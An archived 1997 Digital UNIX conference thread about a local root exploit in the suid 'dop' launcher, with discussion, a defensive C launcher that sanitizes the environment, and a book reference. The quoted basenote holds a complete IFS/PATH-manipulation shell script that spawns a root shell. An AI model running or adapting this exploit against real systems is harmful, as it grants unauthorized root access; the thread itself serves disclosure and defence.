Title: | DIGITAL UNIX (FORMERLY KNOWN AS DEC OSF/1) |
Notice: | Welcome to the Digital UNIX Conference |
Moderator: | SMURF::DENHAM |
Created: | Thu Mar 16 1995 |
Last Modified: | Fri Jun 06 1997 |
Last Successful Update: | Fri Jun 06 1997 |
Number of topics: | 10068 |
Total number of notes: | 35879 |
The following has just appeared in the alpha-osf-managers mailing list: (I hope that our development people are already alerted.)

----------------------------------------------------------------------
Anyone can now grab root through a shell, anyone know what dop is used for?

-------------------------cut here------------------------------------
```sh
#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS=" "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
```
-------------------------cut here------------------------------------
run this script and get a free root shell.
---------------------------------------------------------------------

My comments and questions:

By running strings on /usr/sbin/dop it is obvious that it is some kind of application launcher. It also has the suid bit set. The author thus intended that it will run applications normally restricted to root. The normal syntax is /usr/sbin/dop application arguments. It is also probably a binary wrapper around a TCL script. I guess TCL scripts get the environment set up somehow.

The attacker manipulates IFS - the internal field separator of the shell - to become /, which causes the prepared /tmp/usr to be executed with root privilege.

I would like to know how exactly this manipulation works. Normally carefully written suid programs are considered safe. So what went wrong this time?

Regards,
Chris Jankowski
Melbourne Australia
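The mechanism the basenote asks about, together with the standard defence, as an added example that is not code from this conference or from Digital UNIX's dop. A shell started by a privileged program inherits the caller's environment, and the old Bourne shell applied IFS when splitting every line it read, command names included, so an inherited IFS and PATH decide which program a path component in a script actually names. The fix a carefully written suid launcher applies is to never hand its caller's environment to a child: replace IFS and PATH with fixed values, pass through only a short allow-list, and exec the target by absolute path without going through a shell. The function names, the allow-list and the fixed PATH below are this example's own assumptions.

```c
/* Added example: a minimal privileged launcher that sanitizes the
 * environment before exec. Not Digital UNIX's dop; names are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

#define SAFE_PATH "PATH=/usr/bin:/bin"   /* fixed system path, never the caller's */
#define SAFE_IFS  "IFS= \t\n"            /* whitespace only; an inherited IFS=/ is discarded */
#define MAX_ENV   64

/* Variables we are willing to pass through from the caller unchanged (assumed list). */
static const char *const passthrough[] = { "TERM=", "LANG=", "TZ=", NULL };

static int allowed(const char *kv) {
    for (int i = 0; passthrough[i] != NULL; i++)
        if (strncmp(kv, passthrough[i], strlen(passthrough[i])) == 0)
            return 1;
    return 0;
}

/* Build a NULL-terminated sanitized environment in out[] from in[].
 * Returns the number of entries written (excluding the NULL), or -1 if
 * out[] cannot hold them. Anything not on the allow-list (IFS, PATH,
 * LD_*, ...) is dropped; PATH and IFS are always set to fixed values. */
int sanitize_env(char *const in[], char *out[], size_t max) {
    size_t n = 0;
    if (max < 3) return -1;               /* need room for PATH, IFS and the NULL */
    out[n++] = SAFE_PATH;
    out[n++] = SAFE_IFS;
    for (size_t i = 0; in != NULL && in[i] != NULL; i++) {
        if (!allowed(in[i])) continue;
        if (n + 1 >= max) return -1;      /* keep one slot for the terminating NULL */
        out[n++] = in[i];
    }
    out[n] = NULL;
    return (int)n;
}

/* Value of NAME in a NULL-terminated environment block, or NULL if absent. */
char *env_lookup(char *const env[], const char *name) {
    size_t len = strlen(name);
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, len) == 0 && env[i][len] == '=')
            return env[i] + len + 1;
    return NULL;
}

int main(int argc, char *argv[]) {
    char *env[MAX_ENV];
    /* Absolute path only: no PATH search happens in the launcher itself. */
    if (argc < 2 || argv[1][0] != '/') {
        fprintf(stderr, "usage: %s /absolute/path/to/app [args...]\n", argv[0]);
        return 2;
    }
    if (sanitize_env(environ, env, MAX_ENV) < 0) {
        fprintf(stderr, "caller environment too large\n");
        return 2;
    }
    /* execve with an explicit environment and no shell: the child never
     * sees the caller's IFS or PATH. */
    execve(argv[1], argv + 1, env);
    perror("execve");
    return 1;
}
```

Run as `./launcher /usr/bin/env` under any IFS and PATH setting and the child prints only the fixed PATH, the whitespace IFS and the allowed variables. Using execve with an absolute path rather than system() or execlp keeps a shell, and a PATH lookup, out of the privileged parent; the child can still be a shell script, but it then starts from the sanitized environment.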
T.R | Title | User | Personal Name | Date | Lines |
---|---|---|---|---|---|
9034.1 | See 9029.8 | OSL09::BJORNMY | Open but Secure | Wed Mar 05 1997 04:05 | 6 |
Hopefully now that the whole world knows, this basenote will not be hidden. The method is described in classical texts on Unix security. Bjørn | | | | | |
9034.2 | | SMURF::DENHAM | Digital UNIX Kernel | Wed Mar 05 1997 08:26 | 2 |
Yeah, but maybe we can have just *1* note about it, instead of 3 and counting... | | | | | |
9034.3 | | CADSYS::BOGDANOV | | Wed Mar 05 1997 09:53 | 2 |
Can anyone tell where the 'dop' is used and what for? Can one just remove it or change the 's' bit? | | | | | |
9034.4 | See 9029.1 | SUBPAC::FARICELLI | | Wed Mar 05 1997 10:16 | 0 |
9034.5 | SEE NOTE 9029.11 ** | BSS::BOREN | | Wed Mar 05 1997 21:03 | 1 |
9034.6 | Reference to a book on Unix security. | MEOC02::JANKOWSKI | | Mon Mar 10 1997 07:23 | 9 |
Re .1 I did some background reading. The best reference I found is in "Practical Unix and Internet Security" by Garfinkel and Spafford (O'Reilly and Assoc., second edition 1996). See pages 124-125. Chris Jankowski, Melbourne Australia | | | | | |